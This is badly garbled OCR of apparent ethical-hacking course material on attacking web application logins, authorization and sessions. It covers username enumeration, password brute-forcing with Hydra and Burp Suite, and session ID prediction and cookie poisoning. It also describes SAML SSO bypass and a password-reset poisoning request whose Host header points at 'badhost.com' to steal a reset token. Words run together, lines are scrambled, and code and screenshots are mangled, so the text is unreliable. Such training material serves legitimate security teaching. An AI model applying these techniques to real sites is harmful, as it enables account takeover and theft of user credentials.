can continue to try
different passwords
until theyfind the righto ne. Thus,
even an unprofessional
hacker
login bymanually
‘can entering differentpassword combinations.
Verbose Anyloginformof an application
FailureMessages: users to feedat
requests
leasttwo fields,
namely
username and password.
A few applications
may alsoaskfor
additionalparameters suchas DOB,answer to a security and OTPpin, to
question,
validatea user. If the loginattemptis unsuccessful, the application
indicatesthat the
information provided is not valid.When specifies
the application whichfieldis incorrect
Corpops up reasons for denying can easily
access, attackers exploit
that field bytryinga
large
s et of similar names or wordsto enumerate valid data required
to accessthe
application,
Thelistof enumerateddatacan alsobeusedlaterfor socialengineering.
InsecureTransmissionof Credentials:if an application makesan insecure HTTP
it becomes
connection to passsensitive information, susceptibleto MITM attacks,
through whichattackerscan eavesdropon and impede data transmission.Eventhough
the HTTPS connection is made,attackers
can stillstealthecredentialsif the application
handlescredentialsi n an insecure manner suchas passinginformationas query string
andstoring
parameters, credentialsi n cookies.
ical andCountermensores
Mackin ©by E-Comel
Copyright
passwords
immediately this password
use. Sometimes,
to preventillegitimate reset
featurecan alsobe exploited. Vulnerabilitiesthat are ignored
i n the main login
function
appearagaini n thepassword
‘can reset mechanism. Someoftheflawsin the password
reset mechanism a re as follows:
>
theverboseerror, specifying
Generating ifthe username is valid
© Enabling
guessing of“Existing
password―
fieldwithoutanyrestrictions
Checkingif “New Password―
and “Confirm
Password―
fieldscomprisethe same
valuesonlyafter authenticating password,
the existing thereby an attack
permitting
in identifying
to besuccessful theexistingpassword explicitly
Forgotten
PasswordMechanism:Aswith the password mechanism,
change methods
for recoveringforgotten
passwords oftenentailissues that are commonly ignoredi n the
main login function,
suchas enumerating usernames.Additionally,severaldesign flaws
i n the forgotten
password mechanism often makeit more vulnerable, through which
the overallauthenticationlogicof an application is targeted. Someof the flawsin the
forgotten passwordmechanism a re as follows:
©.
©
Providing
a secondary
Developers
challenge
whena
oftenignorethe chances
user
forgets
application
of the
a
being
password
brute-forcedduring
the password recovery process.If the applicationallowsany numberof attemptsto
recover the password, it is highlylikelythat the password will be recoveredby
guessingrandomanswers relatedto the user
“Remember Me― Functionality: Applications alsoprovide the “Remember Me― function
for convenience to avoidreentryof the username and password whena user tries to
sign into an application from his/her device repeatedly. This mechanismis often
vulnerable because the user can beattackedfromboth a localcomputer and userson
other machines. “Remember
Whenthesecookiesare initiated,
Me―
are
functions enforcedwith some persistent
the application
storedin the earliersession and generates
trusts themas they
a new session without asking
cookies.
were already
for the login
credentialsagain.Attackers can trya listofordinary wordsor enumerated usernamesto
gaincomplete access to the application without being validated.
User Impersonation: Some privileged users access applications using other user
credentialsto assisttheoriginal usersi n performing their operations. Forinstance,ifthe
Internet connection is broken, the user contacts the service provider to seekadvice.
Then,the customer care executive logins with the user data in his or her systemand
assiststhe user i n resolving
to impersonate
escalation,
others,
though
If
the service outage. an application
anyflawsi n theimpersonating
whichan attackerc an gaincomplete
logic
allowsprivileged
are designed
ImproperValidation of Credentials: Applications with proper
authenticationmechanisms passwords
suchas accepting with a minimum length and
allowingcase-sensitive (upper
and lower case},
numeric, and special characters.By
contrast,a poorlydesigned application's
authenticationmechanisms not onlyignore
ical andCountermensores
Mackin ©by E-Comel
Copyright
good implementations
security but also fail to considerthe user’s
attemptsto apply
password
strong characters
some applications
For instance, shortenthe password andevaluateonlythe first few
characters. checkfor case-insensitivepasswords
A few applications andothersperform
‘unusual
characterstripping
beforepassword checks.Attackerscan perform
automated
password guessingattackson suchapplicationsto remove the unwantedtest casesand
shortenthe numberof requests requiredto compromisean account.
A few applications
PredictableUsernamesand Passwords: produce
usernames
‘automatically
basedon a predictable sequence. Attackersexploit this characteristicof
and instantly
a n application acquirethevalid listof usernames,through whichthey c an
perform furtherattacks.
Sometimes, the user list is createdall at once or i n the form of groups, and all these
users’
initialpasswords are distributed via some sources. Thesources for creating
passwords can allow the attacker to guess the passwords of the users. Such
are oftentriggered
vulnerabilities within an intranetenvironment.
InsecureDistribution of Credentials:
Most applications adopt in which
a procedure the
logincredentialsa re supplied
via SMS, email, post,etc. In some cases,what is supplied
to users may includenot onlylogincredentials but also a URLconsisting of an
“activation
enrolling
to change
code― the system-generated
or initially
bunchofsuchURLsare sent to the same users, attackers
multiple
generated passwords.
user accounts anddeducethe activation codessent via URLs
If
can discoverthis activityby
to the
a
newly
enrolledandyet-to-beenrolledusers.
Implementation
Flawsi n Authentication
Mechanism
Sometimes,
carefully
designed
application mechanisms
security to attacksdue
opengateways
‘to
some mistakesin their enforcement.Thesemistakesmay lead to informationleakage,
bypassingof login or diminishing
security, module.Implementation
of the entire security flaws
i n authenticationare more dangerous as they cannot be discoveredwith normaltesting
methods.Someof the implementation flawsin authenticationmechanisms are as follows:
‘=
Fail-Open Login
exceptions,
M echanism:Itis a logicd efectthat
the authenticationprocess.For instance,invoking
suchas 2 null pointerexception,
leadsto significant
consequences
db.getUser()
as the requested
can triggersome
functionhasno username
in.
or password credentialsbut it can still login, Thissession may be dependent on a
specific
user identity; hence, even when it is not fullyfunctional,it can still allow
attackersto access criticalinformationor functionality.
Example,
Response
Public
try (
verifyLogin
(Session mySession)
{
//snwalid credentials
mySession.setMessage (“Login
Failed.―)
return dotogin(mySession) ;
»
)
catch (Exception e) ()
JIvalid user
return ;
mySession.setMessage
doMainMenu
("Login successful!―)
(mySession}
,
Flawsin Multistage LoginFunctionality:
Multistageloginfunctionality
is an advanced
securitymechanism for username-and-password-based
loginmodels.Thislogin method
is performed username and password
in three stages: entry,a challengefor certain
inputdigits or memorable characters,
andvaluesubmissions disclosedon changing a
physical
or
token.Thefirst stageinvolvesusersvalidating
other
input,
valid andthe remainingstages
validationsoftencome with different carry
out with
themselves their username
different
validation
knownas logic
vulnerabilities
checks.
defects.
Such
InsecureStorage Although
of Credentials: an application
mayhaveno inherentflaws,
it
can bystoringlogincredentials
makeitselfvulnerable i n an insecure way. In general,
applications
store user credentialsi n a databaseIn an unencrypted
form, Some
applications algorithms
use weak encryption to encryptand store credentials.
Vulnerabilitiesin suchimplementations
allow attackersto perform
brute-forceand
passwordcracking attacks.
UsernameEnumeration
Source:https://wordpress.com
If a login
error stateswhichof the usernameor password that field can be guessed
is incorrect,
Usingthe trial-and-error
Consider the following
method.
example. Anattackertries to enumerate theusername andpassword of
“RiniMatthews―on wordpress.com. In the first attempt,the attacker tries to loginas
whichresultsi n thelogin
“rini.matthews,― failuremessage“invalid
emailor username.―
ical andCountermensores
Mackin ©by E-Comel
Copyright
rini.matthews
Figure forwermame
14.6: Err message does
not exist
In the secondattempt,
the
statingthat the password
username
attacker
“rinimatthews―
tries
exists.
to login
as “rinimatthews,―
whichresultsi n a message
enteredfor the username is incorrect,thus confirming
that the
forusername
24.63:Eror meszage
Figure successfully
enumerated
t rnimatthews
ical andCountermensores
Mackin ©by E-Comel
Copyright
for the “Old
Password―, and "Confirm
Password―,
“New the NewPassword―
fieldsand
analyze
errors to identify
vulnerabilitiesi n the password
change
functionality.
PasswordRecovery: “Forgot
Password― featuresgenerally a challenge
present to the
user; if the numberof attemptsis not limited,a n attackercan guessthe answer and
solvethe challenge successfully
with the helpof socialengineering.Applications
may
alsosenda uniquerecoveryURLor existing password to an emailaddressspecified
by
the attackerif the challenge
is solved
“Remember Exploit:
Me’ Me"functionsare implemented
“Remember usinga simple
cookiesuchas RememberUser=jason
persistent sessionidentifiersuchas,
of a persistent
RememberUser=ABY112010.
Attackerscan use a n enumeratedusername or the
predict
bypass
sessionidentifierto
authenticationmechanisms.
Password Guessing
Attacks:Password
name implies,
As its password is the process
guessing of guessingpossible user keywords that
mightconstitute an account passworduntil eventuallyarrivingat the correct one. To guess
passwords,
attackersuse techniquessuchas password listsandpassword dictionaries.
Password list
Themajorityof keywordsusedfor preparingthe password
list includescertain daily
usage wordssuchas birth date,street name, nickname,
anniversary date,phone
number, pin number,
or name,
parent'sfriend’s andpet's
n ame.
Createa list of possible
footprinting
password
passwords usingthemost commonly
andsocialengineeringtechniques,
is discovered.
usedpasswords
andtryeachpassword
as as
until the correct well
Dictionary
Password
password
‘A dictionary
is the compilation
of wordandnumbercombinations that could
bepasswords.
Createa dictionary
of
Thistype attack savestime compared
of all possible
passwords
to a bruteforceattack.
usingtoolssuchas Dictionary
Maker to
performdictionary
attacks.
Tools
guessingc an be performed
Password manually
or usingautomatedtoolssuchas THC-
Hydra,
BurpSuite,
andDictionary Maker.
o THC-Hydra
Source:https://www.the.org
THC-Hydra
is a networklogon
crackerthat supports
manydifferentservices,suchas
IPv6 andInternationalized
RFC4013. It comes with a GUI andsupportsHTTP proxy
andSOCKS proxy.Furthermore,it usesvarious authenticationmethodsforservices,
including
Firebird,
FTP,
IMAP, MS-SQL,
LDAP, RDP,SMTP,
SNMP,
andTelnet.
ical andCountermensores
Mackin ©by E-Comel
Copyright
not
use
10.10. 10.16
Please d o in
the-hydra) starting at
rute-forcing
1464;
Figure
of
Screenshot THC-Hydra
Brute-forcing
is anothermethodusedforcracking passwords.
Guessing
becomes crucial
when
Used,
is long
the password or contains lettersi n upper andlower
it couldtakeseveralyearsto guessthepassword, cases.
If numbersand symbols
whichis impractical.
are
Try
to crackthe passwordbytrying possible
all values
from a set of alphabetical,
numerical,
and
special Usepassword
characters. crackingtoolssuchas BurpSuite to crackthe password.
Cracking
Password Tools
Somebrute-forcing
toolsfor cracking
passwords
are described
below.
=
BurpSuite
Source:https://portswigger.net
Burp
©
Suite built-intools
Intercepting and modifying
proxy for inspecting traffic betweenyour browserand
the targetapplication
Application-aware
spider for crawling
content andfunctionality
Web application
scanner for automatingthe detectionof numerous typesof
vulnerabilities
Intruder tool for performing
customizedattacks to find and exploitunusual
vulnerabilities
toolfor manipulating
Repeater andresending
individualrequests
‘Sequencer
tool fortestingtherandomness
ofsessiontokens
ical andCountermensores
Mackin ©by E-Comel
Copyright
Payload
Positions
‘navn
poylouan
arete
och
payed
pontvons
tea
fer
hi signed hb tas
* ‘tart
attack
14.65Screenshot
Figure of BurpSuite
Someadditionalpassword
cracking
toolsare as follows:
LOphtCrack
(https://www.l0phtcrack.com)
(http://opherack
copherack sourceforge.net)
(http://project-rainbowcrack.com)
RainbowCrack
WindowsPassword
Tool
Recovery (https://www.windowspasswordsrecovery.com)
Maker(hetp://dictionarymaker.sourceforge.net)
Dictionary
Password
Attacks:AttackPassword
ResetMechanism.
Insecure password
management lead to
practices critical security
vulnerabilities.One such
vulnerability
is password
reset poisoningthat is exploited
bythe attackerto leverage
headers
suchas Host i n the HTTPrequest
message.
the password
Resetting is @common function usedbythe user when he/she forgets
his/her
password
andneedsto reset it. Theuser receives a forgotpassword
link via emailcontaining
ical andCountermensores
Mackin ©by E-Comel
Copyright
the server responds
the one-time token,andwhenthe link is clicked, with a passwordreset
page.
For example, considerthe following
HTTPrequest wherethe attackeruses the Host headerto
perform theattack:
GET HTTP/1.1
https: //certifiedhacker.com/reset.php?email=footbar.com
Host: badhost.com
Thefollowing password reset link is sent to thevictim:
SresetPwdURL
‘The
=
abovementioned
"https://($_SERVER['HTTP_HOST'
pwdd.php?token=87654321-8765-8765-8765-10987654321"
URLlink is injected in a password
}}/reset-
php?
https: //badhost.com/reset-password token=87654321-8765-8765-
8765-10987654321
Step 3: Now, theattackerwaits for the victim to receive the modifiedemail
Step 4: Oncethe victim clickson the maliciouslinkembeddedi n the email, the attacker
extracts the password reset token.Using this token,the attackerperforms various
maliciousactivities suchas cloning web applications to stealthe user'scredentialsor
Attacks:
Session
the
actingasa proxyandmimickingbehavior
ID Prediction/Brute-forcing,
Session
andcontents ofthe originalwebsite.
Every
time a user logs
i n to a particular
website,the server assigns
a sessionID to the user to
keep
trackof all the activities on the website.Thissession ID is validuntilthe user logs
out; the
server provides
a new session ID when the user logs
in again.Attackerstry to exploit
this
session byguessingthe next session ID after
ID mechanism
For certain web applications, the session ID information
collecting
some validones.
involvesa stringof fixedwidth
Randomness to avoidprediction.
is essential
ical andCountermensores
Mackin ©by E-Comel
Copyright
attacksare performed
Session i n the following
steps:
In the first step, collectsome valid session 1D valuesbysniffing
trafficfrom
authenticatedusers.
Analyze
the captured
sessionIDsto determinethe sessionID generation such
process,
as the structure of the sessionID,the informationthat is usedto createit, and the
encryption or hashalgorithm usedbythe application
to protect it
Vulnerable session generationmechanisms that use session IDs composed of a
username or other predictable
information,suchas timestampor client IP address,
can
beexploited byeasily validsessionIDs.
guessing
you can implement
In addition, a brute-force
technique andtest different
to generate
of
values the session ID
Fromthe diagram below,
until
you successfully
gain access the application.
to
you can see that the sessionIDvariableis indicatedbyJSESSIONID
value is “user01,―
and its assumed whichcorresponds to the username. Byguessing
i ts new
value,say,as “user
02,―
it is possible
for the attackerto gain unauthorizedaccess to the
application.
(et
Uhr
pnt
Steen
10/Web
Moe. Screee
mene 5 004
(Window
NT
ete
U Windows 5.2
entfemteplicton, plietion sine
178
em:
OHTA
rr A.A Gcko/2007051
Feeon/2
GETRequest ‘Accept Mn
et
atenpisis0 homagelog"/*
aS
teleost
fbn:
890/Wetont
eal:
CNA
ave avcsoRe
earn
14.66:
Figure Sereenshot
displaying session cookie
predictable
Exploitation:
Cookie Poisoning
Cookie
Cookies frequently
transmit sensitive credentialsfrom the client browserto the server.
can modify
‘Attackers thesewith ease to gain accessto the server or assume the identity
of
another
user.
Clientbrowsersuse cookiesto maintain a session state when theyemploy statelessHTTP
protocol IDsforcommunication.Serverstie uniquesessionsto the individual accessingtheweb
application. Poisoning of cookiesand session informationcan allow an attacker to inject
malicious
Cookies
content or
can
modify
the user's
onlineexperienceandobtainunauthorized
contain session-specific
datasuch as user IDs,passwords,
information
account numbers, links
to shopping cart contents,supplied privateinformation,and sessionIDs.Theyexist as files
storedi n the clientcomputer's memoryor on its harddisk.Bymodifying the cookiedata, an
attackercan oftengain escalatedaccessor maliciously affectthe user'ssession, Many sites
offerthe “Remember me?―
functionandstore the user informationi n a cookieso that the user
doesnot haveto re-enter the datawith everyvisit to the site. Anyprivateinformation entered
is storedi n a cookie.To protect cookies,site developers often encodethem.Encodedcookies
give developers a falsesenseof cookiesecurity, as the encoding process c an easilybe reversed
with decoding methodssuchas Base64 andROT13 (rotatingthe lettersof the alphabet through
13characters)
Module4 Page1859 ical andCountermensores
Mackin Copyright
©
by E-Comel
Cookiepoisoningis performedi n the following
steps.
If the cookiecontains passwords or sessionidentifiers,stealthecookieusingtechniques
and eavesdropping
suchas scriptinjection
Then,replaythe cookiewith the same or alteredpasswords
or sessionidentifiers
to
‘=
web
bypassapplication authentication
Trapcookiesusingtoolssuchas OWASPZedAttackProxy,andBurpSuite.
Exploitation
Cookie Tools:
=
OWASPZedAttackProxy
Source:https://www.owasp.org
ZedAttackProxy
‘OWASP Project
(ZAP) is an integratedpenetration testingtool for web
applications.
It provides
automated s cannersas well as a set oftoolsthatallowyou to
vulnerabilitiesmanually
find security
ee
[eee nn
| |
oes ee
er omutsan
14.67Screenshot
Figure ofOWASP
ZAP
2 Doge
9) Sun wi 70 we
Someadditionalcookieexploitation
toolsare as follows:
=
LophtCrack
(https://www.lOphtcrack.com)
=
Suite(https://www.portswigger.net)
Burp
Module4 Page1860 tical andCountermensores
Making by Comet
Copyright©
=
xSSer(httpsi//xsser.03c8.net)
Bypass
Authentication:Bypass
SAML-based SSO
Thesingle
a
sign-on (SSO)
single
applications irrespectiveof the domainor platform.
a to
authenticationprocess permits user signi n to an application
s et of credentials,andthe same loginsession can be usedto
For instance,
using
access multiple
whena user logsi n using
his/her Google account on a desktop or mobiledevice, he/she i s automatically
authenticated
for other services suchas Google Drive,YouTube, andGmail.Thisauthenticationmechanism
insidedifferent applicationsis performed usingtheSAMLprotocol.
SecurityAssertionMarkup Language (SAML) is an XML-based infrastructure
that serves as an
authorizationandauthenticationmediumbetweentwo peers, suchas identity provider (IdP)
and service provider (SP).Theservice provider entrusts the identityproviderwith validating
users. Then, the identityprovider responds with an SAMLassertion (confirmation message)
aftervalidating
anyuser.
Es cgstew
Auth
‘hop @: A
mae
2
nr tee
- Qe
Service
Provider
14.65:lustrationof SAMLbased80
Figure
applications
Traditional can perform processbeforeproviding
the authentication protected
functionaccessto the user. With the evolutionof the SSOinfrastructure,
this authentication
processhasbeenhandedover to third-party identityprovider
applications
to access functions
from the service provider application.
Communication betweenthese applications can be
through
established
TheseSAMLmessages
SAML
messages.
are encrypted usingBase64encoding.Attackerscan easily
decryptthese
messagesandreadthe content of the messages.
Twomajorfieldsi n SAMLmessages, signature
and assertion,are susceptible
to midway tampering.Signature is usedto build a trust
betweenthe SPandthe IdP,and assertion is usedto directthe SPon providing
relationship
application
servicesto thevalid users.
can takeadvantage
Attackers misconfigurations,
of signature sessionexpirytimeouts,s ession
replays, SAMLmessages,etc.,to bypass
misdirected SAML-based SSOauthenticationandinsert
their own messages. Attackers u se toolssuchas SAMLRaider to bypass SAM-based SSO
authentication.SAMLRaideris a Burp Suiteextension usedfor SAMLinfrastructuretesting.It
can beusedto perform two core operations: modifying SAMLmessages andmanagingX.509
certificates
ical andCountermensores
Mackin ©by E-Comel
Copyright
SAMLRaider
Using
Configure the browserto proceed
with BurpSuite.OpenBurpSuitewith the new
projectandnavigate to the ‘Proxy’
tab to ensure that the proxyis activated.
In Burp tabandthengo to "BApp
Suite,first,go to the “Extender― store―, click
Then,
andinstall“SAML
Raider―
extension.
Burp
‘Access tab displays
Suite andensure that the “Proxy― “Intercept
is on―.
It enables
Burp to find andtamper with requests directedto the servers. Whentheuser'sbrowser
is pointed to the target(admin@xyz.org) website'ssecuredregistration page,BurpSuite
that
indicates theuser is passed
SAMLRaiderdisplays
system,
to the IdP
a tab with the samename whenthereis SAMLdatathat is to be
decrypted. Usersmay needto passa few more requests beforetheynotice the "SAML
Raider―
tab with a request. Clickingon the “Forward―
button can take the user to the
|dPlogin page.
Soonafterthe user enters the credentials for admin@xyx.org.fakedomain.com, Burp
once again impedes some web requests. Until it showsthe "SAMLRaider― tab,keep
clicking tab to passthem without modifications.Consequently,
the “Forward’ SAML
responses fromtheId? system can alsobe impeded.
Goingthrough
the response can allowa user to find “NamelD―’.
It is locatedbelowthe
tabs.
keyandsignature
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Now,addyourown comment between
two domain
namesandpassthe response.
this
In
case,
signature
as
with messages
valid
14.70:Screenshot
Figure
response,
the is matchingthe
manipulating
of BurpSuite AML
theSPapproves and
processes the first text parameter admin@xyz.org,
in NamelD:
Attackersuse thistechnique to bypass the SAML-basedSSO
processandtamperwiththe
responses.
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackAuthorizationSchemes
CEH
Fis, acess the web application
wing account wth a ndthenescalate
low privleges the privleges
to acess
‘Manipulate
theHIT requests
thatrelat to
user
to subvert
theapplatonauthor
1D,userame, accesgroup, cost,lena 5 modifying
inputfeds
©resto HTTPHeaders
© over
suing nd cookies ©sissontes
Query
String
‘Tampering
ical
Mackin
and ©by CountermensoresCopyright
E-Comel
|
AuthorizationAttack:CookieParameterTampering EH
¢
Authorization Attack
In an authorizationattack,the attackerfirstfindsa legitimate
account with limited privileges,
then logs i n as that user, and gradually escalatesprivilegesto access protected resources.
He/she then manipulates the HTTPrequests to subvertthe applicationauthorizationschemes
bymodifying inputfieldsrelatedto the user ID,username, access group, cost,file names,file
identifiers, etc. Attackers use sources such as uniformresource identifiers, parameter
tampering, POSTdata,HTTPheaders, query strings,cookies, and hidden tagsto perform
authorization attacks.
Uniform ResourceIdentifier:
A uniformresource identifier
(URI)provides
a means to
identify It is a global
a resource. identifierfor Internet resources accessed remotely
or
locally.
An attacker
may use URIsto accessdocuments/directories that are protected
injectSQLqueries or other unusedcommandsinto an application,
from publishing,
and/ormakea
user site
that toanother
view a certain
ParameterTampering:
server.
is connected
Parametertampering involvesthe manipulation
of parameters
exchanged
betweenthe server andthe client to modify the application
data,suchas
ical andCountermensores
Mackin ©by E-Comel
Copyright
price and quantityof products,
permissions, and user credentials.
Thisinformation is
usuallystoredin cookies, or hiddenformfields,
URLquery strings, andattackerscan use
themto increase
POSTData:POST
control
and
application
functionality.
data often comprises authorizationand sessioninformation,
as the
informationprovided bythe clientmust beassociatedwith the session that provided it.
Theattackerc an exploit
vulnerabilitiesin the postdataandeasily manipulate
it.
HTTPHeaders:Webbrowsersdo not allowheadermodification.Therefore,to modify
the header,
the attackerhasto write his/her own programandperform the HTTP
He/she
request. mayalsouse availabletoolsto modify
anydatasent fromthebrowser.
In general,
an authorization
HTTPheadercontainsa username andpassword encodedi n
Base-64.Theattackercan compromise the headerbysubmitting two HTTP requests
boundin the same header.The proxy systemexecutesthe first HTTPheaderandthe
targetsystemexecutes the otherHTTP header, allowing the attackerto bypassthe
proxy’s
access
Query
control,
String andCookies:Browsersuse cookiesto maintain their state i n the stateless
HTTPprotocol as well as to store user preferences,sessiontokens,andother data
Clientscan modify the cookiesandsendthemto the server with URLrequests, thereby
allowingthe attackerto modify thecookie content. Cookiemodification
depends on the
cookieusage,whichrangesfromsession tokensto authorizeddecision-making arrays.
HiddenTags: Whena user
selects
anything
formfieldvalueandsent to theapplication
store field valuesas hiddenfields,
on an HTML page,the selection
as an HTTP
request (GET
is stored
or POST), HTMLcan
whichthe browserdoesnot extract to the screen;
as
a
it collects
instead, during
andsubmitsthesefieldsas parameters formsubmissions,
whichthe user can manipulate. However, he/she hasto makea choice.Codesent to
browsers does not have any security value;therefore, by manipulating
the hidden
values,
the attackerc an easily
access the page andrun it i n the browser.
Tampering
AuthorizationAttack:HTTP Request
HTTP headers controlinformationpassed fromweb clientsto webservers on HTTPrequests
andfromweb servers to webclientson HTTPresponses. Eachheaderconsistsof a singletext
linewith a name anda value.Thereare two main waysto senddatawith HTTP:via the URLor
theform.Tampering with HTTPdatarefersto modifying
beforethe recipientreadsit. Theattackerchanges
user'sID.
of
data the HTTPrequest (orresponse)
the HTTP requestwithout usinganother
Query
String
Tampering
then try to change
If the query stringis visiblei n the addressbar i n the browser, the
stringparameter to bypass authorization mechanisms. Youcan use web spidering
tools
suchas BurpSuiteto scan the webapplication for POST parameters.
ical andCountermensores
Mackin ©by E-Comel
Copyright
hee:
certs
//wor. fiedhacker.com/nail. lbox=Johnécoapany
aspx?mai
hetpe:
//certifiedhackerbank.c adminetrve
HTTP Headers
14.71Sereenshotdsplayng
Figure Query
String
Tampering
If the application
usestheReferer headerformaking accesscontroldecisions, then try
to modifyit to access protected application
functionalities.In the example below,
ItemiD 201is not accessible
=
as the Adminparameter you can change
is set to false; it
to true andaccess protected
items.
‘Authorization
Attack:Cookie
Parameter Tampering
Cookieparameter i s a methodusedto tamperwith the cookiesset bythe web
tampering
to perform
application maliciousattacks.Whenthe user logs
into the site, the web application
setsthe sessioncookieandstoresit in thebrowser.
Cookieparameter is performed
tampering i n the following
steps:
collectsome session cookiesset bythe web application
1. In the first step, and analyze
themto determinethe cookiegeneration mechanism
In the secondstep,trapthe session cookieset bythe web application,
tamperits
parameters usingtools suchas BurpSuite,and replayit to the application
to gain
unauthorized profiles
a ccessto others’
Thetool intercepts sent from the browserand allowsyou to edit the
every request
cookieto replaceit withthe tampered cookieparameters.If the cookieis not secure,
you maybe ableto
BurpSuite guess
theparameters
Source:https://portswigger.net
ical andCountermensores
Mackin ©by E-Comel
Copyright
of BurpSuite
14.73:Sereenshot
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackAccessControls
(©wakvougha wetatetoken he lowing
cesconte Exploiting
InsecureAccessControls
Leo
cet
rn oe sstnedto
om ' (©
Archers request parameters
“Aocons
Controls
Attack
Methods
Jar
teres coions
=
of
Levels grantaccess(employees,
Administratorfunctionality
managers,
to configure
supervisors,
andmonitor:
etc.)
CEOs,
+
Functionalities
Exploiting
that
allow
escalating
Controls
InsecureAccess
privileges
=
Parameter-Based AccessControl:Anyweb application consists of various request
parameters suchas cookiesand query stringparameters. The application determines
the accessgranted to a requestbasedon theseparameters. Theseparameters vary
betweena normaluser andan administrator.Sometimes, theseparameters are invisible
to normalu sers andvisible onlyto administrators.If an attackerc an identify the
parameters that are assigned he/she
to an administrator, can set those parameters in
theirown requests
Referer-Based
to
andgainaccess administrative
functions.
AccessControl:In some web applications, the HTTPrefererI s the
foundationfor major access controldecisions.The HTTP refereris consideredunsafe;
the
attacker
can use it andmanipulate
Location-Based Access
it to
any
Control:Theuser'sgeographic
value,
locationcan bedeterminedusing
various methods.The most common methodto determinethe current location is
through Attackerscan bypass
the IPaddress, location-basedaccesscontrolsusinga web
ical andCountermensores
Mackin ©by E-Comel
Copyright
proxy, a VPN,a data-roaming-enabled
mobiledevice,
directmanipulation
of client-side
mechanisms
AccessControlsAttackMethods
Attackwith differentu ser accounts:Attempt
to accessthe application
withdifferent
user accounts.If there is any brokenaccess controli n the web application,
it allowsyou
to accesstheresources andfunctionalityas a legitimateuser. Youcan use toolssuchas
Burp Suiteto access andcompare two differentuser contexts.
AttackMultistage
isa multistage
Processes:
process
Theabovementioned
established
process, the user will perform
technique
i n the webapplication
multiple entries at multiple
if
will beineffectivethere
architecture.In thismultistage
levels to complete the
intended process.In a multistage
process,multiple requestswill be sent to the server
fromtheclient.Toattacksucha process,eachandevery request to the server shouldbe
captured andtestedfor accesscontrols.Anotherway to attack a multistage process
manually is to walk through a protected multistage process severaltimes i n your
browser and use proxytoolsto switchthe sessiontokensupplied i n different
requests
to that of a lessprivileged
user.
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
AttackSessionManagement
Mechanism CEH
Atackors
(©
controls
breakan applications
a ndimpersonate
session management
prieged applicationusers
to bypass authentication
mechanism
the
Token Session
| Session
Tokens
Prediction
Generation. SessionTokensHandling
© Mani-the-MiddleAttack
©.SeaionTokens Tampering © SessionReplay
Hijacking
©Session
Attacking
SessionTokenGenerationMechanism
Encoding
‘Weak Example
hetpe://iw carts
¢iadhacker con/checkout?
© Obtainol d sesion
readinghexencoing,B a
tokens Session
Token
bysifingthe
ry 3 into
the
trafic
Prediction
or legimatl lagging an analy
application ifr
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacking SessionTokensHandling
Mechanism:
Session Token Sniffing
(©Sit theappiationeaticusing
2 sitingtoo suchasWireshark
BurpSuto
forsesson
tokens
andthe
Unouthoraed
aces otheo
the cookie gain
replay
Use
and Mani
to
session cookiesperform
the-dle atacke
Attack SessionManagement
Mechanism
Webapplication sessionmanagement involvesexchanging sensitive informationbetweenthe
server and its clientswhereverrequired. If suchsession management the attacker
is insecure,
can take advantage of it to attack the web application through the session management
Nowadays,
which
mechanism, is the keysecurity
most attackerstarget
component
application
i n most webapplications.
privileged
by
attackis methodused attackers
Attackersbreakan application's
application
controlsand impersonate
sessionmanagement
to compromise
mechanism to bypass
a web application.
the authentication
users. It involvestwo stages: session token
of andexploitation
‘generation
Togenerate
sessiontokenhandling,
engage i n the following:
a validsession token,attackers
ical andCountermensores
Mackin ©by E-Comel
Copyright
Onceattackersgenerate sessiontokenhandling
a validsessiontoken,theytry to exploit as
follows:
‘+
Man-in-the-Middle(MITM) Attack:Attackersintercept communication betweentwo
systems on a network. They dividethe networkconnection into two: one betweenthe
clientandthe attacker, andthe otherbetweenthe attackerandserver, whichthen acts
as a proxyin the interceptedconnection,
SessionHijacking: Attackersstealthe user session IDfroma trustedwebsiteto perform
malicious
activities
SessionReplay: Attackersobtaintheuser sessionIDandthenreuse it to gainaccessto
the user account.
Attacking
Session
TokenGenerationMechanism
To determinethe session token generation attack,
mechanismi n a session management
attackersstealvalidsession tokensandthen predict
the next session token.
Throughsession prediction,
attackersidentifya patterni n the session token exchanged
betweenthe clientandthe server. Thiscan happenwhen the web application has weak,
predictable
session identifiers.For example, whenthe web applicationassignsa session token
sequentially,
attackersc an predict thepreviousandnext sessiontokensbyknowing anysession
ID.Beforepredictinga session identifier,attackers
haveto obtainsufficientvalidsession tokens
forlegitimate
system
users.
=
WeakEncoding
Example
Whenhex encoding date=08/01/2020,
an ASCIIstringuser=jason;app=admin; you can
predict
anothersession token byjustchanging
the date and use it for another
transaction with the server.
hetps://www.corti
fiedhacker .com/checkout?
SessionToken=%75¢73+65%72%30¢6At61473¥6F¢6E%3B%614
GE83B8648610744653003003802F93003142432430022830
Session
TokenPrediction
70870830861
86446086
Obtainvalid session tokensbysniffing the traffic or legitimately
logging
into the
©.
and
applicationanalyzing
or
any (hex
it for encoding
If any meaningcan be reverse engineered
encoding,
fromthe sample
Base64) pattern
of sessiontokens,
then
attempt to
guessrecently
other
the tokens
application
issuedto users
© Makea large
a requests
with
numberof predicted
to the
page to determine validsession token
tokens a session-dependent
Attacking Session
TokensHandling Mechanism:SessionTokenSniffing
First,sniffnetworktrafficforvalidsessiontokensandthenuse themto predict
thenext session
token,Usethe predicted
sessionIDto authenticatewith the targetweb application.
for session tokensniffing
Thesteps are as follows
ical andCountermensores
Mackin ©by E-Comel
Copyright
trafficusinga sniffing
Sniffthe application tool suchas Wireshark
or an intercepting
proxy being
suchas Burp
If HTTPcookiesare
Suite
used as the transmission mechanism for session tokensand
the secure flagis not set, then try to replay
the cookieto gain unauthorizedaccessto
the application
Use
‘Thus,
sessioncookies
to session
perform
the validsessiontokenis important
sniffing
hijacking,
attacks
in sessionmanagement
andMITM attacks
sessionreplay,
+
Wireshark
Source:https://www.wireshark.org
Wiresharkis a network protocol
analyzer
that allows attackersto captureand
browsenetworktraffic. Wireshark
interactively captureslive networktraffic from
Ethernet,
IEEE802.11,PPP/HDLC,
ATM,Bluetooth, USB,TokenRing, Frame Relay,and
thus helping
FDDInetworks, attackerssniffsessionIDsin transit to and from a target
web application,
|
/inages/aaliCslider_arrowspng
40.30.40.43 $0:10.30.19 RTTP/4.1.(application/i
WYP
40.i0.40.1410,40.10.39__NITP__
4 P09T/andex.anpx
WTP/i-a
i . Post /index aspxNITP/4-4_(applieation/xcw
>
[Timestamps]
T e Ppayloed(436bytes)
